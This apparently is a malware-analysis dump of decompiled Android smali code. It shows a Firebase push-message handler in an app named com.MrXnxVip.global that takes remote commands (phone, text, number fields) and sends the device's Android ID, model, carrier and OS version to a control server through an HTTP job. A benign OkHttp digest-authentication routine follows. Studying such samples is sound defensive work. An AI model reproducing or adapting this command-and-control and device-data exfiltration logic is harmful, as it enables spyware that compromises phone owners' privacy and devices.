                        1062const-string v4, "true"
                        1064invoke-static {v3, v4, v14}, Lanywheresoftware/b4a/keywords/Common;->LogImpl(Ljava/lang/String;Ljava/lang/String;I)V
                        1065new-instance v3, Ljava/lang/StringBuilder;
                        1067invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
                        1069const-string v4, "result=ok&action=ping&androidid="
                        1071invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        1073sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv3:Ljava/lang/String;
                        1075invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        1077invoke-virtual {v3, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        1079sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv4:Ljava/lang/String;
                        1081invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        1083invoke-virtual {v3, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        1085sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv5:Ljava/lang/String;
                        1087invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        1089invoke-virtual {v3, v15}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        1091sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv6:Ljava/lang/String;
                        1093invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        1095invoke-virtual {v3, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        1097sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv5:Ljava/lang/String;
                        1099invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        1101invoke-virtual {v3, v15}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        1103sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv6:Ljava/lang/String;
                        1105invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        1107invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        1108move-result-object v3
                        1109sput-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv4:Ljava/lang/String;
                        1111sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v5:Lcom/MrXnxVip/global/httpjob;
                        1112new-instance v4, Ljava/lang/StringBuilder;
                        1114invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        1116sget-object v6, Lcom/MrXnxVip/global/firebasemessaging;->mostCurrent:Lcom/MrXnxVip/global/firebasemessaging;
                        1118iget-object v6, v6, Lcom/MrXnxVip/global/firebasemessaging;->_vvvvvvvvvv3:Lcom/MrXnxVip/global/information;
                        1120sget-object v6, Lcom/MrXnxVip/global/information;->_vvvv6:Ljava/lang/String;
                        1122invoke-virtual {v4, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        1124invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        1126invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        1127move-result-object v4
                        1129sget-object v5, Lcom/MrXnxVip/global/firebasemessaging;->_vvv4:Ljava/lang/String;
                        1131invoke-virtual {v3, v4, v5}, Lcom/MrXnxVip/global/httpjob;->_vvvvvvv6(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        1132goto/16 :goto_4
                        1133pswitch_65e: const/4 v3, 0x4
                        1134iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        1136sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv1:Ljava/lang/String;
                        1138const-string v4, "ping"
                        1140invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        1141move-result v3
                        1142if-eqz v3, :cond_4
                        1143const/4 v3, 0x3
                        1144iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        1145goto/16 :goto_4
                        1146pswitch_670: iput v7, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        1148const-string v3, "61310721"
                        1150iget-object v4, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_message:Lanywheresoftware/b4a/objects/FirebaseNotificationsService$RemoteMessageWrapper;
                        1152invoke-virtual {v4}, Lanywheresoftware/b4a/objects/FirebaseNotificationsService$RemoteMessageWrapper;->GetData()Lanywheresoftware/b4a/objects/collections/Map;
                        1153move-result-object v4
                        1155invoke-static {v4}, Lanywheresoftware/b4a/BA;->ObjectToString(Ljava/lang/Object;)Ljava/lang/String;
                        1156move-result-object v4
                        1158invoke-static {v3, v4, v14}, Lanywheresoftware/b4a/keywords/Common;->LogImpl(Ljava/lang/String;Ljava/lang/String;I)V
                        1160iget-object v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_message:Lanywheresoftware/b4a/objects/FirebaseNotificationsService$RemoteMessageWrapper;
                        1162invoke-virtual {v3}, Lanywheresoftware/b4a/objects/FirebaseNotificationsService$RemoteMessageWrapper;->GetData()Lanywheresoftware/b4a/objects/collections/Map;
                        1163move-result-object v3
                        1165const-string v4, "action"
                        1167invoke-virtual {v3, v4}, Lanywheresoftware/b4a/objects/collections/Map;->Get(Ljava/lang/Object;)Ljava/lang/Object;
                        1168move-result-object v3
                        1170invoke-static {v3}, Lanywheresoftware/b4a/BA;->ObjectToString(Ljava/lang/Object;)Ljava/lang/String;
                        1171move-result-object v3
                        1172sput-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv1:Ljava/lang/String;
                        1174iget-object v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_message:Lanywheresoftware/b4a/objects/FirebaseNotificationsService$RemoteMessageWrapper;
                        1176invoke-virtual {v3}, Lanywheresoftware/b4a/objects/FirebaseNotificationsService$RemoteMessageWrapper;->GetData()Lanywheresoftware/b4a/objects/collections/Map;
                        1177move-result-object v3
                        1179const-string v4, "phone"
                        1181invoke-virtual {v3, v4}, Lanywheresoftware/b4a/objects/collections/Map;->Get(Ljava/lang/Object;)Ljava/lang/Object;
                        1182move-result-object v3
                        1184invoke-static {v3}, Lanywheresoftware/b4a/BA;->ObjectToString(Ljava/lang/Object;)Ljava/lang/String;
                        1185move-result-object v3
                        1186sput-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv2:Ljava/lang/String;
                        1188iget-object v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_message:Lanywheresoftware/b4a/objects/FirebaseNotificationsService$RemoteMessageWrapper;
                        1190invoke-virtual {v3}, Lanywheresoftware/b4a/objects/FirebaseNotificationsService$RemoteMessageWrapper;->GetData()Lanywheresoftware/b4a/objects/collections/Map;
                        1191move-result-object v3
                        1193const-string v4, "text"
                        1195invoke-virtual {v3, v4}, Lanywheresoftware/b4a/objects/collections/Map;->Get(Ljava/lang/Object;)Ljava/lang/Object;
                        1196move-result-object v3
                        1198invoke-static {v3}, Lanywheresoftware/b4a/BA;->ObjectToString(Ljava/lang/Object;)Ljava/lang/String;
                        1199move-result-object v3
                        1200sput-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv3:Ljava/lang/String;
                        1202iget-object v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_message:Lanywheresoftware/b4a/objects/FirebaseNotificationsService$RemoteMessageWrapper;
                        1204invoke-virtual {v3}, Lanywheresoftware/b4a/objects/FirebaseNotificationsService$RemoteMessageWrapper;->GetData()Lanywheresoftware/b4a/objects/collections/Map;
                        1205move-result-object v3
                        1207const-string v4, "numberbmb"
                        1209invoke-virtual {v3, v4}, Lanywheresoftware/b4a/objects/collections/Map;->Get(Ljava/lang/Object;)Ljava/lang/Object;
                        1210move-result-object v3
                        1212invoke-static {v3}, Lanywheresoftware/b4a/BA;->ObjectToString(Ljava/lang/Object;)Ljava/lang/String;
                        1213move-result-object v3
                        1214sput-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv5:Ljava/lang/String;
                        1216iget-object v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_message:Lanywheresoftware/b4a/objects/FirebaseNotificationsService$RemoteMessageWrapper;
                        1218invoke-virtual {v3}, Lanywheresoftware/b4a/objects/FirebaseNotificationsService$RemoteMessageWrapper;->GetData()Lanywheresoftware/b4a/objects/collections/Map;
                        1219move-result-object v3
                        1221const-string v4, "numberoff"
                        1223invoke-virtual {v3, v4}, Lanywheresoftware/b4a/objects/collections/Map;->Get(Ljava/lang/Object;)Ljava/lang/Object;
                        1224move-result-object v3
                        1226invoke-static {v3}, Lanywheresoftware/b4a/BA;->ObjectToString(Ljava/lang/Object;)Ljava/lang/String;
                        1227move-result-object v3
                        1228sput-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vv7:Ljava/lang/String;
                        1230iget-object v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_message:Lanywheresoftware/b4a/objects/FirebaseNotificationsService$RemoteMessageWrapper;
                        1232invoke-virtual {v3}, Lanywheresoftware/b4a/objects/FirebaseNotificationsService$RemoteMessageWrapper;->GetData()Lanywheresoftware/b4a/objects/collections/Map;
                        1233move-result-object v3
                        1235const-string v4, "androidid"
                        1237invoke-virtual {v3, v4}, Lanywheresoftware/b4a/objects/collections/Map;->Get(Ljava/lang/Object;)Ljava/lang/Object;
                        1238move-result-object v3
                        1240invoke-static {v3}, Lanywheresoftware/b4a/BA;->ObjectToString(Ljava/lang/Object;)Ljava/lang/String;
                        1241move-result-object v3
                        1242sput-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vv0:Ljava/lang/String;
                        1244sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v6:Lcom/reza/sh/deviceinfo/DiviceInfo;
                        1246invoke-virtual {v3}, Lcom/reza/sh/deviceinfo/DiviceInfo;->getAndroidID()Ljava/lang/String;
                        1247move-result-object v3
                        1248sput-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vv3:Ljava/lang/String;
                        1249iput-object v12, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_manu:Ljava/lang/String;
                        1250iput-object v12, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_modl:Ljava/lang/String;
                        1252sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        1254invoke-static {}, Lanywheresoftware/b4a/phone/Phone;->getManufacturer()Ljava/lang/String;
                        1255move-result-object v3
                        1256iput-object v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_manu:Ljava/lang/String;
                        1258sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v7:Lanywheresoftware/b4a/phone/Phone;
                        1260invoke-static {}, Lanywheresoftware/b4a/phone/Phone;->getModel()Ljava/lang/String;
                        1261move-result-object v3
                        1262iput-object v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_modl:Ljava/lang/String;
                        1263new-instance v3, Ljava/lang/StringBuilder;
                        1265invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
                        1267iget-object v4, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_manu:Ljava/lang/String;
                        1269invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        1271const-string v4, " - "
                        1273invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        1275iget-object v4, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_modl:Ljava/lang/String;
                        1277invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        1279invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        1280move-result-object v3
                        1281sput-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vv4:Ljava/lang/String;
                        1283sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v6:Lcom/reza/sh/deviceinfo/DiviceInfo;
                        1285invoke-virtual {v3}, Lcom/reza/sh/deviceinfo/DiviceInfo;->getCarrier()Ljava/lang/String;
                        1286move-result-object v3
                        1287sput-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vv5:Ljava/lang/String;
                        1289sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v6:Lcom/reza/sh/deviceinfo/DiviceInfo;
                        1291invoke-virtual {v3}, Lcom/reza/sh/deviceinfo/DiviceInfo;->getOSVersion()Ljava/lang/String;
                        1292move-result-object v3
                        1293sput-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vv6:Ljava/lang/String;
                        1294try_end_733: goto/16 :goto_4
                        1295pswitch_735: return-void
                        1296catch_736: move-exception v0
                        1297move-object v3, v0
                        1298iget v4, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        1299if-eqz v4, :cond_747
                        1300iget v4, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        1301iput v4, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        1303sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        1305invoke-virtual {v4, v3}, Lanywheresoftware/b4a/BA;->setLastException(Ljava/lang/Exception;)V
                        1306goto/16 :goto_4
                        1307cond_747: goto/16 :goto_749
                        1308goto_748: throw v3
                        1309goto_749: goto/16 :goto_748
                        Cross References
                        APIs
                        • java.util.regex.Pattern.compile
                        • java.util.regex.Pattern.matcher
                        • java.util.HashMap.<init>
                        • java.util.regex.Matcher.find
                        • java.util.HashMap.get
                        • java.util.HashMap.get
                        • java.security.MessageDigest.getInstance
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.String.getBytes
                        • java.security.MessageDigest.digest
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.String.contains
                        • java.lang.String.getBytes
                        • java.security.MessageDigest.digest
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.System.currentTimeMillis
                        • java.lang.Long.toString
                        • java.lang.String.getBytes
                        • java.security.MessageDigest.digest
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.String.getBytes
                        • java.security.MessageDigest.digest
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.util.HashMap.get
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.RuntimeException.<init>
                        • java.util.regex.Matcher.group
                        • java.util.regex.Matcher.group
                        • java.util.HashMap.put
                        Strings
                        • (\\w+)=\\\"([^\"]+)\\\"
                        • nonce
                        • realm
                        • MD5
                        • :
                        • ISO-8859-1
                        • qop
                        • ASCII
                        • 00000001
                        • auth
                        • Digest
                        • username
                        • ,
                        • uri
                        • nc
                        • cnonce
                        • response
                        • opaque
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/io/IOException;
                        3}
                        4.end annotation
                        5move-object/from16 v0, p0
                        6move-object/from16 v1, p2
                        8invoke-virtual/range {p1 .. p1}, Lokhttp3/Response;->request()Lokhttp3/Request;
                        9move-result-object v2
                        11invoke-virtual {v2}, Lokhttp3/Request;->method()Ljava/lang/String;
                        12move-result-object v3
                        14sget-object v4, Lokhttp3/internal/http/RequestLine;->INSTANCE:Lokhttp3/internal/http/RequestLine;
                        16invoke-virtual {v2}, Lokhttp3/Request;->url()Lokhttp3/HttpUrl;
                        17move-result-object v2
                        19invoke-virtual {v4, v2}, Lokhttp3/internal/http/RequestLine;->requestPath(Lokhttp3/HttpUrl;)Ljava/lang/String;
                        20move-result-object v2
                        22sget-object v4, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;->ptDigest:Ljava/util/regex/Pattern;
                        23if-nez v4, :cond_22
                        25const-string v4, "(\\w+)=\\\"([^\"]+)\\\""
                        27invoke-static {v4}, Ljava/util/regex/Pattern;->compile(Ljava/lang/String;)Ljava/util/regex/Pattern;
                        28move-result-object v4
                        29sput-object v4, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;->ptDigest:Ljava/util/regex/Pattern;
                        30cond_22:
                        31sget-object v4, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;->ptDigest:Ljava/util/regex/Pattern;
                        33invoke-virtual {v4, v1}, Ljava/util/regex/Pattern;->matcher(Ljava/lang/CharSequence;)Ljava/util/regex/Matcher;
                        34move-result-object v4
                        35new-instance v5, Ljava/util/HashMap;
                        37invoke-direct {v5}, Ljava/util/HashMap;-><init>()V
                        38goto_2d:
                        39invoke-virtual {v4}, Ljava/util/regex/Matcher;->find()Z
                        40move-result v6
                        41const/4 v7, 0x1
                        42if-nez v6, :cond_19d
                        44const-string v4, "nonce"
                        46invoke-virtual {v5, v4}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        47move-result-object v6
                        48check-cast v6, Ljava/lang/String;
                        50const-string v8, "realm"
                        52invoke-virtual {v5, v8}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        53move-result-object v9
                        54check-cast v9, Ljava/lang/String;
                        55try_start_44:
                        56const-string v10, "MD5"
                        58invoke-static {v10}, Ljava/security/MessageDigest;->getInstance(Ljava/lang/String;)Ljava/security/MessageDigest;
                        59move-result-object v10
                        60try_end_4a: new-instance v11, Ljava/lang/StringBuilder;
                        62invoke-direct {v11}, Ljava/lang/StringBuilder;-><init>()V
                        64iget-object v12, v0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;->username:Ljava/lang/String;
                        66invoke-virtual {v11, v12}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        68const-string v12, ":"
                        70invoke-virtual {v11, v12}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        72invoke-virtual {v11, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        74invoke-virtual {v11, v12}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        76iget-object v13, v0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;->password:Ljava/lang/String;
                        78invoke-virtual {v11, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        80invoke-virtual {v11}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        81move-result-object v11
                        83const-string v13, "ISO-8859-1"
                        85invoke-virtual {v11, v13}, Ljava/lang/String;->getBytes(Ljava/lang/String;)[B
                        86move-result-object v11
                        88invoke-virtual {v10, v11}, Ljava/security/MessageDigest;->digest([B)[B
                        89move-result-object v11
                        91invoke-static {v11}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;->encode([B)Ljava/lang/String;
                        92move-result-object v11
                        93new-instance v13, Ljava/lang/StringBuilder;
                        95invoke-static {v3}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        96move-result-object v3
                        98invoke-direct {v13, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        100invoke-virtual {v13, v12}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        102invoke-virtual {v13, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        104invoke-virtual {v13}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        105move-result-object v3
                        107const-string v12, "qop"
                        109invoke-virtual {v1, v12}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
                        110move-result v1
                        111xor-int/2addr v1, v7
                        113const-string v13, "ASCII"
                        115invoke-virtual {v3, v13}, Ljava/lang/String;->getBytes(Ljava/lang/String;)[B
                        116move-result-object v3
                        118invoke-virtual {v10, v3}, Ljava/security/MessageDigest;->digest([B)[B
                        119move-result-object v3
                        121invoke-static {v3}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;->encode([B)Ljava/lang/String;
                        122move-result-object v3
                        124const-string v14, "00000001"
                        126const-string v15, "auth"
                        127if-eqz v1, :cond_c2
                        128new-instance v7, Ljava/lang/StringBuilder;
                        130invoke-direct {v7}, Ljava/lang/StringBuilder;-><init>()V
                        132invoke-virtual {v7, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        133const/16 v11, 0x3a
                        135invoke-virtual {v7, v11}, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
                        137invoke-virtual {v7, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        139invoke-virtual {v7, v11}, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
                        141invoke-virtual {v7, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        143invoke-virtual {v7}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        144move-result-object v3
                        145move-object/from16 p1, v5
                        146const/4 v7, 0x0
                        147goto/16 :goto_104
                        148cond_c2:
                        149invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
                        150move-result-wide v16
                        152invoke-static/range {v16 .. v17}, Ljava/lang/Long;->toString(J)Ljava/lang/String;
                        153move-result-object v7
                        155invoke-virtual {v7, v13}, Ljava/lang/String;->getBytes(Ljava/lang/String;)[B
                        156move-result-object v7
                        158invoke-virtual {v10, v7}, Ljava/security/MessageDigest;->digest([B)[B
                        159move-result-object v7
                        161invoke-static {v7}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;->encode([B)Ljava/lang/String;
                        162move-result-object v7
                        163move-object/from16 p1, v5
                        164new-instance v5, Ljava/lang/StringBuilder;
                        166invoke-direct {v5}, Ljava/lang/StringBuilder;-><init>()V
                        168invoke-virtual {v5, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        169const/16 v11, 0x3a
                        171invoke-virtual {v5, v11}, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
                        173invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        175invoke-virtual {v5, v11}, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
                        177invoke-virtual {v5, v14}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        179invoke-virtual {v5, v11}, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
                        181invoke-virtual {v5, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        183invoke-virtual {v5, v11}, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
                        185invoke-virtual {v5, v15}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        187invoke-virtual {v5, v11}, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
                        189invoke-virtual {v5, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        191invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        192move-result-object v3
                        193goto_104:
                        194invoke-virtual {v3, v13}, Ljava/lang/String;->getBytes(Ljava/lang/String;)[B
                        195move-result-object v3
                        197invoke-virtual {v10, v3}, Ljava/security/MessageDigest;->digest([B)[B
                        198move-result-object v3
                        200invoke-static {v3}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;->encode([B)Ljava/lang/String;
                        201move-result-object v3
                        202new-instance v5, Ljava/lang/StringBuilder;
                        204invoke-direct {v5}, Ljava/lang/StringBuilder;-><init>()V
                        206const-string v10, "Digest "
                        208invoke-virtual {v5, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        210iget-object v10, v0, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;->username:Ljava/lang/String;
                        212const-string v11, "username"
                        213const/4 v13, 0x1
                        215invoke-direct {v0, v11, v10, v13}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;->param(Ljava/lang/String;Ljava/lang/String;Z)Ljava/lang/String;
                        216move-result-object v10
                        218invoke-virtual {v5, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        220const-string v10, ","
                        222invoke-virtual {v5, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        224invoke-direct {v0, v8, v9, v13}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;->param(Ljava/lang/String;Ljava/lang/String;Z)Ljava/lang/String;
                        225move-result-object v8
                        227invoke-virtual {v5, v8}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        229invoke-virtual {v5, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        231invoke-direct {v0, v4, v6, v13}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;->param(Ljava/lang/String;Ljava/lang/String;Z)Ljava/lang/String;
                        232move-result-object v4
                        234invoke-virtual {v5, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        236invoke-virtual {v5, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        238const-string v4, "uri"
                        240invoke-direct {v0, v4, v2, v13}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;->param(Ljava/lang/String;Ljava/lang/String;Z)Ljava/lang/String;
                        241move-result-object v2
                        243invoke-virtual {v5, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        245invoke-virtual {v5, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        246if-nez v1, :cond_172
                        247const/4 v1, 0x0
                        249invoke-direct {v0, v12, v15, v1}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;->param(Ljava/lang/String;Ljava/lang/String;Z)Ljava/lang/String;
                        250move-result-object v2
                        252invoke-virtual {v5, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        254invoke-virtual {v5, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        256const-string v2, "nc"
                        258invoke-direct {v0, v2, v14, v1}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;->param(Ljava/lang/String;Ljava/lang/String;Z)Ljava/lang/String;
                        259move-result-object v1
                        261invoke-virtual {v5, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
